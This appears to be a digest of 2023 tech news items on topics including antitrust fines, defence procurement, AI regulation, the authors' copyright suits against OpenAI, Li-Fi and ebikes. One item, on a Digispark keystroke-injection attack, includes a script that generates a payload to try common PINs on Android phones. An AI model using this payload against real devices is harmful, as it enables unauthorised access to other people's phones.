Spain’s antitrust watchdog on Tuesday said it had imposed fines worth a total of 194.1 million euros ($218.03 million) on Amazon (AMZN.O) and Apple (AAPL.O) for colluding to limit the online sale of devices from Apple and its competitors in Spain.
The two contracts the companies signed on Oct. 31, 2018 granting Amazon the status of authorized Apple dealer included anti-competitive clauses that affected the online market for electronic devices in Spain, CNMC, as the watchdog is known, said in a statement.
Apple was fined 143.6 million euros and Amazon 50.5 million euros. The two companies have two months to appeal the decision.
[…]
“The two companies restricted without justification the number of sellers of Apple products on the Amazon website in Spain,” CNMC said.
More than 90% of the existing retailers who were using Amazon’s marketplace to sell Apple devices were blocked as a result, it added.
Amazon also reduced the capacity of retailers in the European Union based outside Spain to access Spanish customers, and restricted the advertising Apple’s competitors were allowed to place on its website when users searched for Apple products, the regulator said.
Following the deal between the two tech giants, the prices of Apple devices sold online rose in Spain, it added.
Taco Bell succeeded in its petition to remove the “Taco Tuesday” trademark held by Taco John’s, claiming it held an unfair monopoly over the phrase. Taco John’s CEO Jim Creel backed down from the fight on Tuesday, saying it isn’t worth the legal fees to retain the regional chain’s trademark.
“We’ve always prided ourselves on being the home of Taco Tuesday, but paying millions of dollars to lawyers to defend our mark just doesn’t feel like the right thing to do,” Taco John’s CEO Jim Creel said in a statement to CNN.
Taco John’s adopted the “Taco Tuesday” slogan back in the early 1980s as a two-for-one deal, labeling the promotion as “Taco Twosday” in an effort to ramp up sales. The company trademarked the term in 1989 and owned the right to the phrase in all states with the exception of New Jersey, where Gregory’s Restaurant & Tavern beat out Taco John’s by trademarking the term in 1982.
Three decades later, Taco John’s finally received pushback when Taco Bell filed a petition with the U.S. Patent and Trademark Office in May to cancel the trademark, saying any restaurant should be able to use “Taco Tuesday.”
If you think about it, the ability to trademark two common words in sequence doesn’t make much sense at all. For any two-word combination, there must have been prior common use.
The United Kingdom’s deal to buy three, rather than the previously planned five, Boeing E-7A Wedgetail airborne early warning and control (AEW&C) aircraft for the Royal Air Force “represents extremely poor value for money” and “an absolute folly.” Those are among the conclusions of a report published today by the U.K. Defense Committee, a body that examines Ministry of Defense (MoD) expenditure, administration, and policy on behalf of the British parliament.
A computer-generated rendering of an E-7A Wedgetail in RAF service. Crown Copyright
At the center of the report’s criticism of the procurement is the fact that, as a result of a contract stipulation, the MoD is having to pay for all five Northrop Grumman Multi-role Electronically Scanned Array (MESA) radars, even though only three aircraft — which will be designated Wedgetail AEW1 in RAF service — are being acquired. The report assesses that the total cost of the three-aircraft order will be $2.5 billion, compared to the $2.7 billion agreed for five of the radar planes.
“Even basic arithmetic would suggest that ordering three E-7s rather than five (at some 90 [percent] of the original acquisition cost) represents extremely poor value for money,” the report contends.
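Spelled out with the report’s own figures, that arithmetic is easy to reproduce (a quick sketch; the per-aircraft numbers are simple division, not contract line items):

```python
# The committee's "basic arithmetic," using the report's figures:
# $2.7B agreed for five aircraft vs. an assessed ~$2.5B for three.
cost_five, cost_three = 2.7e9, 2.5e9

print(f"Share of original cost: {cost_three / cost_five:.0%}")        # ~93%
print(f"Per aircraft, five-jet deal: ${cost_five / 5 / 1e6:.0f}M")    # $540M
print(f"Per aircraft, three-jet deal: ${cost_three / 3 / 1e6:.0f}M")  # $833M
```

Roughly 93 percent of the money buys 60 percent of the fleet, with the per-aircraft cost jumping by more than half.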
The E-7 procurement is one of three major defense deals dealt with by the report, which comes at the end of a six-month inquiry. The Type 26 anti-submarine warfare frigate for the Royal Navy and the Ajax armored fighting vehicle for the British Army also come in for criticism. Worryingly, the overall conclusion is that the U.K.’s defense procurement system is “broken” and that “multiple, successive reviews have not yet fixed it.”
[…]
The report suggests that the tiny fleet will be a “prize target” for aggressors. Not only will the AEW&C aircraft play a critical role in any high-end air campaign, but planes of this type are also increasingly under threat from long-range air defenses and are far from survivable in any kind of contested airspace.
The same report also warns that the initial operating capability for the RAF E-7s could be delayed by a further year, to 2025. This is especially concerning given that the RAF retired its previous E-3D Sentry AEW1 radar planes in 2021, leaving a massive capability gap.
[…]
Other problems are dogging the U.K.’s plans to field the E-7, the report explains, including the failure of Boeing and the British procurement arm, Defense Equipment and Support (DE&S), to agree on an in-service support contract. The report says that such a contract “should already have been successfully finalized long ago.”
So procurement can’t argue that although the savings in initial procurement are minimal, the savings on through-life costs will be huge – because it has no idea what the through-life costs of the platform are!
Stability AI, the startup behind the image-generating model Stable Diffusion, is launching a new service that turns sketches into images.
The sketch-to-image service, Stable Doodle, leverages the latest Stable Diffusion model to analyze the outline of a sketch and generate a “visually pleasing” artistic rendition of it. It’s available starting today through ClipDrop, a platform Stability acquired in March through its purchase of Init ML, an AI startup founded by ex-Googlers.
[…]
Under the hood, powering Stable Doodle is a Stable Diffusion model — Stable Diffusion XL — paired with a “conditional control solution” developed by one of Tencent’s R&D divisions, the Applied Research Center (ARC). Called T2I-Adapter, the control solution both allows Stable Diffusion XL to accept sketches as input and guides the model to enable better fine-tuning of the output artwork.
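The same building blocks are publicly available in the open source diffusers library, so the approach is easy to sketch. The model IDs and parameters below are illustrative assumptions, not Stable Doodle’s production setup, and the snippet assumes a CUDA GPU:

```python
# Minimal sketch of sketch-conditioned SDXL generation with a T2I-Adapter.
# Model IDs and parameters are assumptions for illustration only.
import torch
from diffusers import StableDiffusionXLAdapterPipeline, T2IAdapter
from diffusers.utils import load_image

# Load one of Tencent ARC's public sketch adapters and pair it with SDXL.
adapter = T2IAdapter.from_pretrained(
    "TencentARC/t2i-adapter-sketch-sdxl-1.0", torch_dtype=torch.float16
)
pipe = StableDiffusionXLAdapterPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-1.0",
    adapter=adapter,
    torch_dtype=torch.float16,
).to("cuda")

# A black-on-white doodle guides composition; the prompt supplies the style.
sketch = load_image("doodle.png")
image = pipe(
    prompt="a cozy cabin in a snowy forest, watercolor",
    image=sketch,
    adapter_conditioning_scale=0.9,  # how strongly the sketch constrains output
).images[0]
image.save("result.png")
```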
Researchers have created a film from a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in the exoskeletons of crustaceans.
The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.
The results of the research are reported in an article published in Food Packaging and Shelf Life.
[…]
Limonene has been used before in films for food packaging, where its antioxidant and anti-microbial action helps preserve the contents, but its performance is impaired by its volatility and instability during the packaging manufacturing process, even on a laboratory scale.
[…]
“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.
The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced at a large enough scale to be competitive, but also because the poly(limonene) production process still needs to be optimized to improve yield and to be tested in the manufacture of commercial packaging.
[…]
More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085
Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash. The arrestee later pleaded guilty to a drug trafficking charge.
How exactly did cops know Zayas fit the bill for drug trafficking?
Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.
For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.
Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.
In this case, Rekor helped police assess the route that Zayas’ car had been taking over a multi-year period. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’ activity consistent with that of a drug trafficker.
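Rekor’s models are proprietary, so the following is a toy sketch only, but it shows how “suspicious route” flagging from raw ALPR reads could work in principle (the thresholds and features are invented for illustration):

```python
# Toy sketch of route flagging from ALPR reads. Rekor's actual models are
# proprietary; every threshold and feature here is an illustrative assumption.
from collections import defaultdict
from datetime import datetime, timedelta

# Each read: (plate, camera_region, timestamp) -- 16M vehicles a week,
# per the article.
reads = [
    ("ABC123", "MA", datetime(2023, 3, 1, 9)),
    ("ABC123", "NY-upstate", datetime(2023, 3, 1, 12)),
    ("ABC123", "MA", datetime(2023, 3, 1, 15)),
    # ... millions more
]

# Group sightings into per-vehicle trajectories, ordered by time.
trips = defaultdict(list)
for plate, region, ts in sorted(reads, key=lambda r: r[2]):
    trips[plate].append((region, ts))

def looks_suspicious(history, max_stay=timedelta(hours=4)) -> bool:
    """Flag out-and-back runs between regions with conspicuously short stays."""
    for (a, t1), (_b, _t2), (c, t3) in zip(history, history[1:], history[2:]):
        if a == c and _b != a and (t3 - t1) <= max_stay * 2:
            return True
    return False

flagged = [plate for plate, history in trips.items() if looks_suspicious(history)]
print(flagged)  # ['ABC123']
```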
Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?
Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.
Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.
Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.
But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.
Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”
Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.
AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”
As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.
Operators are also required to secure licenses for their AIs under most circumstances.
AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.
Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.
The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.
You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why there are separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.
All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.
The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.
Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation
But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.
Under this definition, all search engines would be copyright infringing, because they’re effectively doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so too would be scanning internet content to train an LLM. Arguably the latter case is way more transformative.
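To make the analogy concrete, here’s a toy sketch (purely illustrative) of what a search index actually stores: a structure derived from “reading” pages, not copies of the pages themselves.

```python
# Toy inverted index: the crawler "reads" pages and keeps only a derived
# word -> locations structure, which is the point of the analogy.
from collections import defaultdict

pages = {
    "example.com/a": "the cabin at the end of the world",
    "example.com/b": "the end of copyright as we know it",
}

index = defaultdict(set)
for url, text in pages.items():
    for word in text.split():
        index[word].add(url)

print(sorted(index["end"]))  # ['example.com/a', 'example.com/b']
```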
And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.
But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for there to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.
For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.
The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.
For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.
BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.
If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.
And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:
As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka B-ok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most likely sources of trainable books most similar in nature and size to OpenAI’s description of Books2.
Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.
This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.
Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.
I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since legal fee awards are much more common in copyright cases).
That said, if we’ve learned anything at all in the past two-plus decades of lawsuits about copyright and the internet, it’s that courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.
Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.
Trying the twenty most common PINs doesn’t take long.
The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.
The hardware is not much more than a Digispark board, a small ATtiny85-based board with a built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.
Once connected to a mobile device, it performs a keystroke injection attack, automatically sending keyboard events to input the most common PINs with a delay between each attempt. Assuming the device keeps accepting input, trying all twenty codes takes about six minutes.
Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video, embedded below.
Bruteforcing PIN protection of popular app using $3 ATTINY85 #Arduino
Testing all possible PIN combinations (10,000) would take less than 1.5 hours without getting account locked. It is possible coz, PIN is limited only to 4 digits, without biometrics authentication. #rubberducky pic.twitter.com/rbu9Tk3S9d
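To make the attack concrete, here’s a minimal sketch that generates a Rubber Ducky-style (DuckyScript) payload to try a list of common PINs. The PIN list and delays are illustrative assumptions, not the exact values from [Mobile Hacker]’s proof of concept, which runs as an Arduino sketch on the Digispark itself.

```python
# Minimal sketch: generate a DuckyScript keystroke-injection payload that
# tries a list of common PINs. PIN list and timing are illustrative only.

COMMON_PINS = [  # a commonly cited sample of popular 4-digit PINs
    "1234", "1111", "0000", "1212", "7777",
    "1004", "2000", "4444", "2222", "6969",
]

ATTEMPT_DELAY_MS = 15_000  # pause between attempts to ride out soft lockouts

def ducky_payload(pins, delay_ms=ATTEMPT_DELAY_MS):
    """Emit DuckyScript that types each PIN, presses ENTER, then waits."""
    lines = ["DELAY 2000"]  # give the phone time to enumerate the keyboard
    for pin in pins:
        lines += [f"STRING {pin}", "ENTER", f"DELAY {delay_ms}"]
    return "\n".join(lines)

if __name__ == "__main__":
    print(ducky_payload(COMMON_PINS))
    # Rough duration estimate: 20 PINs at ~18 s per attempt (15 s delay plus
    # typing time) is about 6 minutes, in line with the write-up's figure.
    total_s = 20 * (ATTEMPT_DELAY_MS / 1000 + 3)
    print(f"# ~{total_s / 60:.0f} minutes for 20 attempts")
```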
Today, the Institute of Electrical and Electronics Engineers (IEEE) has added 802.11bb as a standard for light-based wireless communications. The publishing of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the data-transmission technology.
Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability between Li-Fi systems and the hugely successful Wi-Fi will be fully addressed.
[…]
Where Li-Fi shines (pun intended) is not just in its purported speeds of up to 224 Gbps. Fraunhofer’s Dominic Schulz points out that because it works in an exclusive optical spectrum, it offers higher reliability and lower latency and jitter. Moreover, “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Schulz.
[…]
One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.
[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes
[…]
While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.
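How a rolling key code works is easy to sketch. A common construction derives a short one-time code from a shared secret and a moving counter, HOTP-style (RFC 4226). VanMoof’s actual protocol is not public, so everything below is an illustrative assumption:

```python
# Minimal sketch of a counter-based rolling code (HOTP-style, RFC 4226).
# VanMoof's real scheme is not public; this is an illustrative stand-in.
import hmac
import hashlib

def rolling_code(shared_secret: bytes, counter: int, digits: int = 6) -> str:
    """Derive a short one-time code from a secret and a moving counter."""
    msg = counter.to_bytes(8, "big")
    digest = hmac.new(shared_secret, msg, hashlib.sha256).digest()
    # Truncate to a fixed number of decimal digits, HOTP-style.
    offset = digest[-1] & 0x0F
    value = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(value % 10**digits).zfill(digits)

secret = b"example-shared-secret"
print(rolling_code(secret, counter=42))
# If only the vendor's server holds the secret, no server means no fresh
# codes: exactly the failure mode described above. Cowboy's workaround
# amounts to letting owners hold a long-lived key locally instead.
```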
Rival ebike company Cowboy has a solution
A rival ebike company, Belgian company Cowboy, has stepped in to offer a solution. TNW reports that it has created an app which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.
If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.
[…]
In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.
[…]
Perhaps we need standards here. For example, requiring all functionality (bar firmware updates) to work without access to an external server.
Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?
Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.
Tens of thousands of fraudsters splurged on Lamborghinis, vacation homes, private jet flights and Cartier jewelry by fleecing the PPP loan system in a $200 billion heist — and did it because the COVID loan scheme was so easy to milk.
Approximately $1.2 trillion in COVID bailout cash for businesses was rushed through Congress in 2020 and 2021 and spent through the Economic Injury Disaster Loan Program (EIDLP) and the Paycheck Protection Program (PPP).
And the SBA estimates there are more than 90,000 “actionable leads,” while it has already prosecuted dozens — including a former New York Jets wide receiver, Josh Bellamy.
The spending spree on taxpayer dollars includes Donald Finley, owner of the now-shuttered Manhattan theme restaurant Jekyll & Hyde, who used millions of dollars from PPP and EIDLP to purchase a Nantucket home with waterfront views across from Dionis Beach.
Finley faces up to 30 years in prison, and paying more than $3.2 million in restitution, plus a $1.25 million fine.
And experts say crooks created fake businesses or lied about their numbers of employees to get access to more free cash — because it was so simple to fleece the taxpayer.
“The fraud was so easy to commit. All of the information was self-reported and none of it was verified or checked,” Haywood Talcove of LexisNexis Risk Solutions told The Post.
“During the height of the pandemic, it was really hard to purchase [luxury] items like a Rolls-Royce, or a high-end Mercedes because you had people walking in with cash from the PPP program to purchase those items for whatever the dealer was asking,” Talcove said.
Justice might finally be catching up with some of the fraudsters: A total of 803 arrests have taken place as of May 2023 for pandemic fraud, the SBA said.
In a statement about the strike, the Alliance of Motion Picture and Television Producers (AMPTP) said that its proposal included “a groundbreaking AI proposal that protects actors’ digital likenesses for SAG-AFTRA members.”
When asked about the proposal during the press conference, SAG-AFTRA chief negotiator Duncan Crabtree-Ireland said: “This ‘groundbreaking’ AI proposal that they gave us yesterday, they proposed that our background performers should be able to be scanned, get one day’s pay, and their companies should own that scan, their image, their likeness and should be able to use it for the rest of eternity on any project they want, with no consent and no compensation. So if you think that’s a groundbreaking proposal, I suggest you think again.”
In response, AMPTP spokesperson Scott Rowe sent out a statement denying the claims made during SAG-AFTRA’s press conference. “The claim made today by SAG-AFTRA leadership that the digital replicas of background actors may be used in perpetuity with no consent or compensation is false. In fact, the current AMPTP proposal only permits a company to use the digital replica of a background actor in the motion picture for which the background actor is employed. Any other use requires the background actor’s consent and bargaining for the use, subject to a minimum payment.”
The use of generative AI has been one of the major sticking points in negotiations between the two sides (it’s also a major issue behind the writers strike), and in her opening statement of the press conference, SAG-AFTRA president Fran Drescher said that “If we don’t stand tall right now, we are all going to be in trouble, we are all going to be in jeopardy of being replaced by machines.”
After nearly a decade in development, Ellie Weinstein’s Cocoa Press chocolate 3D printer kit is expected to start shipping before the end of the year. Derived from the Voron 0.1 design, the kit is meant to help those with existing 3D printing experience expand their repertoire beyond plastics and into something a bit sweeter.
So who better to host our recent 3D Printing Food Hack Chat? Ellie took the time to answer questions not just about the Cocoa Press itself, but the wider world of printing edible materials. While primarily designed for printing chocolate, with some tweaks, the hardware is capable of extruding other substances such as icing or peanut butter. It’s just a matter of getting the printers in the hands of hackers and makers, and seeing what they’ve got an appetite for.
So, why chocolate? It’s a pretty straightforward question to start the chat on, but Ellie’s answer might come as a surprise. It wasn’t due to some love of chocolate or desire to print custom sweets, at least, not entirely. She simply thought it would be an easy material to work with when she started tinkering with the initial versions of her printer back in 2014. The rationale was that it didn’t take much energy to melt, and that it would return to a solid on its own at room temperature. While true, this temperature sensitivity ended up being exactly why it was such a challenge to work with.
It didn’t take long for the downsides of a generative AI-empowered newsroom to make themselves obvious, between CNET’s secret chatbot reviews editor last November and Buzzfeed’s subsequent mass layoffs of human staff in favor of AI-generated “content” creators. The specter of being replaced by a “good enough AI” looms large in many a journalist’s mind these days, with as many as a third of the nation’s newsrooms expected to shutter by the middle of the decade.
But AI doesn’t have to necessarily be an existential threat to the field. As six research teams showed at NYU Media Lab’s AI & Local News Initiative demo day in late June, the technology may also be the key to foundationally transforming the way local news is gathered and produced.
Now in its second year, the initiative is tasked with helping local news organizations to “harness the power of artificial intelligence to drive success.” It’s backed as part of a larger $3 million grant from the Knight Foundation, which is funding four such programs in total in partnership with the Associated Press, Brown Institute’s Local News Lab, NYC Media Lab and the Partnership on AI.
This year’s cohort included a mix of teams from academia and private industry, coming together over the course of the 12-week development course to build “AI applications for local news to empower journalists, support the sustainability of news organizations and provide quality information for local news audiences,” NYU Tandon’s news service reported.
“There’s value in being able to bring together people who are working on these problems from a lot of different angles,” Matt Macvey, Community and Project Lead for the initiative, told Engadget, “and that’s what we’ve tried to facilitate.”
“It also creates an opportunity because … if these news organizations that are out there doing good work are able to keep communicating their value and maintain trust with their readers,” he continued, “I think we could get an information ecosystem where a trusted news source becomes even more valued when it becomes easier [for anyone] to make low-quality [AI generated] content.”
[…]
“Bangla AI will search for information relevant to the people of the Bengali community that has been published in mainstream media … then it will translate for them. So when journalists use Bangla AI, they will see the information in Bengali rather than in English.” The system will also generate summaries of mainstream media posts both in English and Bengali, freeing up local journalists to cover more important news than rewriting wire copy.
Similarly, the team from Chequeado, a non-profit organization fighting disinformation in the public discourse, showed off the latest development of its Chequeabot platform, Monitorio. It leverages AI and natural language processing capabilities to streamline fact-checking efforts in Spanish-language media. Its dashboard continually monitors social media in search of trending misinformation and alerts fact checkers so they can blunt a piece’s virality.
“One of the greatest promises of things like this and Bangla AI,” Chequeado team member Marcos Barroso said during the demo, “is the ability for this kind of technology to go to an under-resourced newsroom and improve their capacity, and allow them to be more efficient.”
The Newsroom AI team from Cornell University hopes that its writing assistant platform will help do for journalists what Copilot did for coders: eliminate drudge work. Newsroom can automate a number of common tasks, including transcription and information organization, image and headline generation, and SEO implementation. The system will reportedly even write articles in a journalist’s personal style if fed enough training examples.
On the audio side, New York public radio WNYC’s team spent its time developing and prototyping a speech-to-text model that will generate real-time captioning and transcription for its live broadcasts. WNYC is the largest public media station in New York, reaching 2 million visitors monthly through its news website.
“Our live broadcast doesn’t have a meaningful entry point right now for deaf or hard of hearing audiences,” WNYC team member Sam Guzik said during the demo. “So, what we really want to think about as we’re looking to the future is: how can we make our audio more accessible to those folks who can’t hear?”
Utilizing AI to perform the speech-to-text transformation alleviates one of the biggest sticking points of modern closed-captioning: it’s expensive and resource-intensive to turn around quickly when humans do it. “Speech-to-text models are relatively low cost,” Guzik continued. “They can operate at scale and they support an API-driven architecture that would tie into our experiences.”
The result is a proof-of-concept audio player for the WNYC website that generates accurate closed captioning of whatever clip is currently being played. The system can go a step further by summarizing the contents of that clip in a few bullet points, simply by clicking a button on the audio player.
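WNYC hasn’t said which model powers the prototype, but the shape of such a pipeline is easy to sketch with the open source Whisper model as a stand-in (everything here is an assumption, not WNYC’s actual stack):

```python
# Minimal sketch of a transcribe-for-captions pipeline, using Whisper as a
# stand-in speech-to-text model. WNYC has not said which model it uses, so
# treat the specifics as assumptions. Requires: pip install openai-whisper
# (plus ffmpeg on the system path).
import whisper

model = whisper.load_model("base")
result = model.transcribe("broadcast_clip.mp3")
print(result["text"])  # full caption text for the audio player

# Segments carry timestamps, which is what live-style captioning needs.
for seg in result["segments"]:
    print(f"[{seg['start']:7.2f} -> {seg['end']:7.2f}] {seg['text']}")
```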
[…]
the Graham Media Group created an automated natural language text prompter to nudge the comments sections of local news articles closer towards civility.
